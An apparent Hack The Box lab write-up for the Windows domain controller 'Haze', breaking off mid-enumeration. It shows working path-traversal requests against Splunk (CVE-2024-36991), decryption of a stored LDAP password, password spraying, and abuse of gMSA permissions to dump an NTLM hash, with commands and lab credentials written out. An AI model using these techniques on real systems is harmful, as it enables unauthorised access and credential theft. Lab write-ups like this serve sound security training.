HTB | Haze

Machine - https://app.hackthebox.com/machines/Haze

IP - 10.10.11.61

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,445,464,593,636,3268,3269,5985,8000,8088,8089,47001,49664,49665,49666,49667,49668,57704,57708,57712,57756 10.10.11.61 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 10:26 IST
Nmap scan report for haze.htb (10.10.11.61)
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-21 12:56:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp  open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp  open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
8089/tcp  open  ssl/http      Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: splunkd
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57704/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
57708/tcp open  msrpc         Microsoft Windows RPC
57712/tcp open  msrpc         Microsoft Windows RPC
57756/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-21T12:57:18
|_  start_date: N/A
|_clock-skew: 7h59m57s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.29 seconds

Port 53

└─$ dig ANY haze.htb @10.10.11.61     

; <<>> DiG 9.20.8-6-Debian <<>> ANY haze.htb @10.10.11.61
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30082
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;haze.htb.                      IN      ANY

;; ANSWER SECTION:
haze.htb.               600     IN      A       10.10.11.61
haze.htb.               3600    IN      NS      dc01.haze.htb.
haze.htb.               3600    IN      SOA     dc01.haze.htb. hostmaster.haze.htb. 113 900 600 86400 3600

;; ADDITIONAL SECTION:
dc01.haze.htb.          3600    IN      A       10.10.11.61

;; Query time: 471 msec
;; SERVER: 10.10.11.61#53(10.10.11.61) (TCP)
;; WHEN: Sat Jun 21 10:15:11 IST 2025
;; MSG SIZE  rcvd: 135

Port 8000

└─$ whatweb -v -a 3 http://10.10.11.61:8000/                                                        
WhatWeb report for http://10.10.11.61:8000/
Status    : 303 See Other
Title     : 303 See Other
IP        : 10.10.11.61
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[Splunkd], Meta-Refresh-Redirect[http://10.10.11.61:8000/en-US/], RedirectLocation[http://10.10.11.61:8000/en-US/], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]

Detected Plugins:
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Splunkd (from server string)

[ Meta-Refresh-Redirect ]
        Meta refresh tag is a deprecated URL element that can be 
        used to optionally wait x seconds before reloading the 
        current page or loading a new page. More info: 
        https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh 

        String       : http://10.10.11.61:8000/en-US/

[ RedirectLocation ]
        HTTP Server string location. used with http-status 301 and 
        302 

        String       : http://10.10.11.61:8000/en-US/ (from location)

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-content-type-options (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the 
        HTTP header. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

HTTP Headers:
        HTTP/1.1 303 See Other
        Date: Sat, 21 Jun 2025 12:59:37 GMT
        Content-Type: text/html; charset=UTF-8
        X-Content-Type-Options: nosniff
        Content-Length: 335
        Location: http://10.10.11.61:8000/en-US/
        Vary: Accept-Language
        Connection: Close
        X-Frame-Options: SAMEORIGIN
        Server: Splunkd

WhatWeb report for http://10.10.11.61:8000/en-US/
Status    : 303 See Other
Title     : <None>
IP        : 10.10.11.61
Country   : RESERVED, ZZ

Summary   : Cookies[session_id_8000], HTTPServer[Splunkd], HttpOnly[session_id_8000], RedirectLocation[http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]

Detected Plugins:
[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : session_id_8000

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Splunkd (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie 
        response header and the browser supports it then the cookie 
        cannot be accessed through client side script - More Info: 
        http://en.wikipedia.org/wiki/HTTP_cookie 

        String       : session_id_8000

[ RedirectLocation ]
        HTTP Server string location. used with http-status 301 and 
        302 

        String       : http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F (from location)

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-content-type-options (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the 
        HTTP header. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

HTTP Headers:
        HTTP/1.1 303 See Other
        Date: Sat, 21 Jun 2025 12:59:39 GMT
        Content-Type: text/html;charset=utf-8
        X-Content-Type-Options: nosniff
        Content-Length: 125
        Content-Encoding: gzip
        Vary: Accept-Encoding, Cookie
        Connection: Close
        X-Frame-Options: SAMEORIGIN
        Location: http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
        Set-Cookie: session_id_8000=006a3b11cccd0a0dc7b568b4b2a155621fcb01cc; expires=Sat, 21 Jun 2025 13:59:39 GMT; HttpOnly; Max-Age=3600; Path=/
        Server: Splunkd

WhatWeb report for http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
Status    : 200 OK
Title     : <None>
IP        : 10.10.11.61
Country   : RESERVED, ZZ

Summary   : Bootstrap, Cookies[cval,splunkweb_uid], HTML5, HTTPServer[Splunkd], Meta-Author[Splunk Inc.], Script[text/json], probably Splunk, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]

Detected Plugins:
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : cval
        String       : splunkweb_uid

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Splunkd (from server string)

[ Meta-Author ]
        This plugin retrieves the author name from the meta name 
        tag - info: 
        http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
        #author

        String       : Splunk Inc.

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

        String       : text/json

[ Splunk ]
        Splunk indexes and makes searchable data from any app, 
        server or network device in real time including logs, 
        config files, messages, alerts, scripts and metrics. 

        Certainty    : probably
        Google Dorks: (1)
        Website     : http://www.splunk.com

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-content-type-options (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the 
        HTTP header. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the 
        HTTP header and meta http-equiv tag. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc817574.aspx 

        String       : IE=edge
        String       : IE=edge

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sat, 21 Jun 2025 12:59:41 GMT
        Expires: Thu, 26 Oct 1978 00:00:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, max-age=0
        Content-Type: text/html; charset=UTF-8
        X-Content-Type-Options: nosniff
        Content-Length: 4318
        Content-Encoding: gzip
        Vary: Accept-Encoding, Cookie
        Connection: Close
        Set-Cookie: cval=1829136398; Path=/en-US/account/
        X-UA-Compatible: IE=edge
        Set-Cookie: splunkweb_uid=E67A8998-46AC-43B4-B3E3-4BB25F187161; Path=/en-US/account; Max-Age=157680000; Expires=Thu, 20 Jun 2030 12:59:41 GMT
        X-Frame-Options: SAMEORIGIN
        Server: Splunkd

Looks like a Splunk server, Let’s visit the site

Foothold/shell

Shell as edward.martin

CVE-2024-36991

Looking for a known vulnerability for Splunk we found CVE-2024-36991

In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.

Let’s try to look for some files

http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

We found hashes for admin, edward, mark and paul

Let’s try to crack these via hashcat

it did not work

Let’s look for config files for Splunk (refer this)

└─$ curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../Splunk/etc/system/local/authentication.conf 
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

Here we found bindDNpassword for Paul

Auth as Paul.Taylor

According to this discussion, we can crack the password if we can have splunk.secret

A simple Google search tells us the path $SPLUNK_HOME/etc/auth/splunk.secret, and we can curl that

└─$ curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../Splunk/etc/auth/splunk.secret  
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD                  

found splunksecrets tool for working with Splunk secrets offline

└─$ splunksecrets splunk-decrypt --splunk-secret splunk.secret 
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

And we now have Paul’s Cred

Let's see can we do smb or winrm via this

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec winrm 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.61     5985   DC01             [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

Since we can smb via paul’s cred, let’s enum shares and users

┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --users
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.11.61     445    DC01             paul.taylor                   2025-06-21 15:12:44 0        
SMB         10.10.11.61     445    DC01             [*] Enumerated 1 local users: HAZE

┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --shares
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [*] Enumerated shares
SMB         10.10.11.61     445    DC01             Share           Permissions     Remark
SMB         10.10.11.61     445    DC01             -----           -----------     ------
SMB         10.10.11.61     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.61     445    DC01             C$                              Default share
SMB         10.10.11.61     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.61     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.61     445    DC01             SYSVOL          READ            Logon server share 
                                                                                                          

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             500: HAZE\Administrator (SidTypeUser)
SMB         10.10.11.61     445    DC01             501: HAZE\Guest (SidTypeUser)
SMB         10.10.11.61     445    DC01             502: HAZE\krbtgt (SidTypeUser)
SMB         10.10.11.61     445    DC01             512: HAZE\Domain Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             513: HAZE\Domain Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             514: HAZE\Domain Guests (SidTypeGroup)
SMB         10.10.11.61     445    DC01             515: HAZE\Domain Computers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             516: HAZE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             517: HAZE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             518: HAZE\Schema Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             519: HAZE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.61     445    DC01             521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             525: HAZE\Protected Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             526: HAZE\Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1000: HAZE\DC01$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1101: HAZE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1103: HAZE\paul.taylor (SidTypeUser)
SMB         10.10.11.61     445    DC01             1104: HAZE\mark.adams (SidTypeUser)
SMB         10.10.11.61     445    DC01             1105: HAZE\edward.martin (SidTypeUser)
SMB         10.10.11.61     445    DC01             1106: HAZE\alexander.green (SidTypeUser)
SMB         10.10.11.61     445    DC01             1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1112: HAZE\Support_Services (SidTypeGroup)

I will copy the sidtypeuser and print the names

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep -i 'user' | sed -E 's/.*HAZE\\([^ ]+).*/\1/' > username.txt   
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat username.txt 
Administrator
Guest
krbtgt
Domain
Protected
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

Let’s password spray the password of paul and see if someone is reusing it or not

└─$ netexec smb 10.10.11.61 -u username.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Domain:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Protected:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 

mark.adams is also using paul’s password

Auth as Mark.adams

I can winrm via mark

─$ netexec winrm 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.61     5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

and we are in as Mark

Mark is a part of gMSA_Managers group

*Evil-WinRM* PS C:\Users\mark.adams> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                         Attributes
=========================================== ================ =========================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
HAZE\gMSA_Managers                          Group            S-1-5-21-323145914-28650650-2368316563-1107 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
*Evil-WinRM* PS C:\Users\mark.adams> 

Bloodhound

Let’s use bloodhound-python

└─$ bloodhound-python -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'  -d HAZE.htb -ns 10.10.11.61 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 52S
INFO: Compressing output into 20250621221004_bloodhound.zip

We can see MARK.ADMAS@HAZE.HTB -> MemberOf -> GMSA_MANAGERS@HAZE.HTB

A Group Managed Service Account (gMSA) is a special type of Active Directory (AD) account that administrators use to run automated services securely. Microsoft introduced it in Windows Server 2012 to solve the common problem of managing service account passwords. Unlike traditional service accounts, where administrators often set passwords manually and rarely update them, gMSAs allow Active Directory to manage passwords automatically. Reference: https://www.hackingarticles.in/readgmsapassword-attack/

GMSA_Managers

Currently, Mark does not have read permission

└─$ netexec ldap 10.10.11.61 -u mark.adams  -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP        10.10.11.61     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: <no read permissions>                PrincipalsAllowedToReadPassword: Domain Admins

We can check who has the permission to view the password

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity "Haze-IT-Backup$" -Properties PrincipalsAllowedToRetrieveManagedPassword

DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :

Since Domain Admins can view the password, and Mark is not a domain admin, but mark is in the gMSA administrator group, so try to modify the readable user

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity "Haze-IT-Backup$" -Properties PrincipalsAllowedToRetrieveManagedPassword

DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Mark Adams,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :

*Evil-WinRM* PS C:\Users\mark.adams\Documents> 

Now we can retrieve the password of Haze-IT-Backup$

└─$ netexec ldap 10.10.11.61 -u mark.adams  -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP        10.10.11.61     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: 4de830d1d58c14e241aff55f82ecdba1     PrincipalsAllowedToReadPassword: mark.adams

So the best practice is to try to update bloodhound content as soon as you get a user within the domain

Bloodhound via new hash

└─$ bloodhound-python -u 'Haze-IT-Backup$' --hashes :4de830d1d58c14e241aff55f82ecdba1 -d HAZE.htb -ns 10.10.11.61 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 9 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
